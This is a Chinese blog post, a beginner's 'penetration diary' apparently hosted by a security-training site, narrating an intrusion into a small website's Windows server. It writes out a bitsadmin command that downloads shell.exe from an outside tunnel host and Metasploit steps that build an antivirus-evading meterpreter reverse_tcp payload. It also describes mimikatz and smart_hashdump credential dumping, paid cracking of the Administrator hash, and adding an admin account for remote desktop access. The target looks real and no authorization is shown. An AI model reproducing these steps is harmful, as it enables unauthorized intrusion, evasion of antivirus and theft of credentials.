菜鸡的渗透日记( 二 ) _渗透

bitsadmin还有bitsadmin的下载方法， win7以上可以使用，但是这个环境也是成功了，感觉比powershell好用
bitsadmin /transfer n http://xxxxxx.natappfree.cc/shell.exe C:Pathshell.exe
5. 恶心的杀软当晚大意了，没注意进程里有没有杀软，一直不上线，本地测试也一直不上线，造成了vps出问题的假象
修了一晚上的vps ，才发现是我本地杀软没关，连不上，对方的机子里有杀软，也连不上
tasklist看一下，对方的机子里有腾讯安全管家（由于我的智障操作，导致后来远程桌面连上后，杀软已经报了好几个毒，还好没被发现）
尝试免杀免杀还是第一次，所以只会拿工具免杀
先是试了shellter ， avet ， venom ，都没过（可能是我工具使用姿势不对）
然后查到了一篇Evasion的免杀，这个免杀是msf的一个模块，在metasploit5.0加入，不得不说msf真是强大
msf5 > use evasion/windows/windows_defender_exe
msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp
msf5 > set LHOST
msf5 > set LPORT
msf5 > run
然后就会生成一个随机名字的，为了测试，本地下了一个腾讯安全管家

文章插图

这次成功的上线了
6. 尝试抓明文密码猕猴桃用msf自带的mimikatz抓明文密码
load mimikatz
kerberos
由于杀软问题，抓不到明文密码
msf自带模块又是强大的msf起作用了，
post/windows/gather/smart_hashdump模块抓明文密码

文章插图

Administrator的密码是第二个哈希值，第一个是空密码
拿哈希值去cmd5解密，是一条付费的，正好群里有个师傅快到期了，帮解密，成功的拿到明文密码
7. 远程连接当时直接连上了Administrator的账户，队里师傅说会把别人踢下线
正确操作应该是添加个管理员账号，然后再连

文章插图

小站无内网，渗透结束
相关实验：
Metasploit制作木马后门
https://www.hetianlab.com/expc.do?ec=ECID1932-04d9-4856-88c7-e02fb889edd3
声明：笔者初衷用于分享与普及网络知识，若读者因此作出任何危害网络安全行为后果自负，与合天智汇及原作者无关！